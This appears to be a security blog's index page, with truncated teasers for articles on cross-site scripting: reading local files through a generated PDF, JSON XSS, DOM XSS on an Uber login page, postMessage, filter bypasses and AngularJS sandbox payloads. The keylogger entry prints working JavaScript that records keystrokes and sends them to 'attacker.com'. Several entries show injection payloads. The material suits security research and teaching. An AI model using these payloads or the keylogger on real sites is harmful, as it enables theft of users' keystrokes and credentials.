Local File read via xss in dynamically generated pdf

Introduction: This article describes how to use XSS to read files on the server and have them printed into a PDF. https://xyz.com/payments/downloadStatements?Id=b9bc3d&utrnumber=xyz&date... The utrnumber parameter is the XSS injection point. Payload 1: "aaaa" appears in the downloaded PDF. <p id="test">aaa</p><script>document.getElementById('test').innerHTML+='aa'</script> Payload 2: The downloaded PDF shows the PDF's own path, e.g. file://... <…

Story of a JSON XSS

Assume the following injection_point exists, with content_type: text/html. { "xxx": true, "yyy": [injection_point] } Payload 1 - Failure yyy=test<haha> But the injection_point HTML-encodes <>. { "xxx": true, "yyy": <strong>test&lt;haha&gt;</strong> } Payload 2 - Failure yyy[testarray]…

XSS Keylogger

k.js keys = ""; document.onkeypress = function(e){ get = window.event? event:e; key = get.keyCode? get.KeyCode:get.charCode; key = String.fromCharCode(key); keys +=key; } setInterval(function(){ fetch('//attacker.com/k.php?k=' + keys); }, 1000); k.php <?php $k = $_GET["k"]; if(!empty(…

DOM Xss in auth.uber.com

Background Affected Link: https://auth.uber.com/login/?next_url=https%3A%2F%2Faccounts.uber.com%2Fprofile%2F&state=CISjEn7fDHVmQybjIOq_ZfPU8cVhJh9mOSsme-LYJUo%3D Decoded as: https://auth.uber.com/login/?next_url=https://accounts.uber.com/profile/&state=CISjEn7fDHVmQybjIOq_ZfPU8cVhJh9mOSsme-LYJUo= next_url: this parameter specifies where the user is redirected to. Open Redirect https://auth.uber.com/…

Xss and Postmessage

1. SOP // HTML of attack.com <iframe src="http://mybank.com/balance" name="mybank"></iframe> <script> document.getElementsByName('mybank')[0].onload = function() { frames[0].getElementById("message").innerHTML = "Hello World."; } </script> //HTML of mybank.com/…

Cross Site Scripting Bypass

zseano | UK Security Researcher describes several methods for bypassing XSS filters. The most creative one: register three users, have each of the three users input one part of the payload, and when the page renders, the parts are assembled into a complete payload.…

Angular XSS Series

Payload List PortSwigger Web Security Blog: XSS without HTML: Client-Side Template Injection with AngularJS 0x00. Introducing the AngularJS Javascript Framework - XSS in AngularJS Video 0x1. Sandbox Bypass in Version 1.0.8 - XSS with AngularJS Video 0x2. New Sandbox Bypass in 1.4.7 - XSS in AngularJS…